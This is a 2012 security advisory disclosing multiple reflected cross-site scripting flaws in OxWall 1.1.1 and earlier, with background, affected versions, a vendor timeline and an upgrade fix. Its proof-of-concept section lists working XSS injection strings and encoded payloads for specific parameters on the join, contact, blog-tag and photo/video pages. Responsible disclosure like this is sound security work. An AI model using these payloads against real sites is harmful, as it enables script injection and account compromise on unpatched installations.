OxWall versions 1.1.1 and below suffer from multiple cross site scripting vulnerabilities.
aa17b9ab1afce80ee4812c2e458301ecc7578225189c2f5bf27a236830a31060
1. OVERVIEW
OxWall 1.1.1 and lower versions are vulnerable to Cross Site Scripting.
2. BACKGROUND
Oxwall is a free open source software package for building social
networks, family sites and collaboration systems. It is a flexible
community website engine developed with the aim to provide people with
a well-coded, user-friendly software platform for social needs. It is
easy to set up, configure and manage Oxwall while you focus on your
site idea. We are testing the concept of free open source community
software for complete (site,sub-site setups) and partial
(widgets,features) community and collaboration solutions for companies
and individuals.
3. VULNERABILITY DESCRIPTION
Multiple parameters were not properly sanitized, which allows attacker
to conduct Cross Site Scripting attack. This may allow an attacker to
create a specially crafted URL that would execute arbitrary script
code in a victim's browser.
4. VERSIONS AFFECTED
1.1.1 and lower
5. PROOF-OF-CONCEPT/EXPLOIT
URL: https://localhost/Oxwall/join
Injected Attack String: '"><script>alert(/XSS/)</script>
Method: HTTP POST
Vulnerable Parameters: captchaField, email, form_name ,password
,realname ,repeatPassword ,username
------------------------------------------------------------------------------------
URL: https://localhost/Oxwall/contact
Injected Attack String: '"><script>alert(/XSS/)</script>
Method: HTTP POST
Vulnerable Parameters: captcha, email, form_name ,from , subject
------------------------------------------------------------------------------------
URL: https://localhost/Oxwall/blogs/browse-by-tag?tag=%27%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
Vulnerable Parameter: tag
----------------------------------------------------------------------------
Vulnerable Parameter: RAW-URI
https://localhost/Oxwall/photo/viewlist/tagged/><img src=xs onerror=alert('XSS')>
https://localhost/Oxwall/photo/viewlist/%22style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22onmouseover=alert%28%27XSS%27%29;%22x=
https://localhost/Oxwall/video/viewlist/%22style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22onmouseover=alert%28%27XSS%27%29;%22x=
6. SOLUTION
Upgade to the latest version of Oxwall.
7. VENDOR
Oxwall Foundation
https://www.oxwall.org/
8. CREDIT
Aung Khant, https://yehg.net, YGN Ethical Hacker Group, Myanmar.
9. DISCLOSURE TIME-LINE
2011-06-09: notified vendor
2012-02-20: vulnerability disclosed
10. REFERENCES
Original Advisory URL:
https://yehg.net/lab/pr0js/advisories/%5BOxWall_1.1.1%5D_xss
Oxwall Home Page: https://www.oxwall.org/
#yehg [2012-02-20]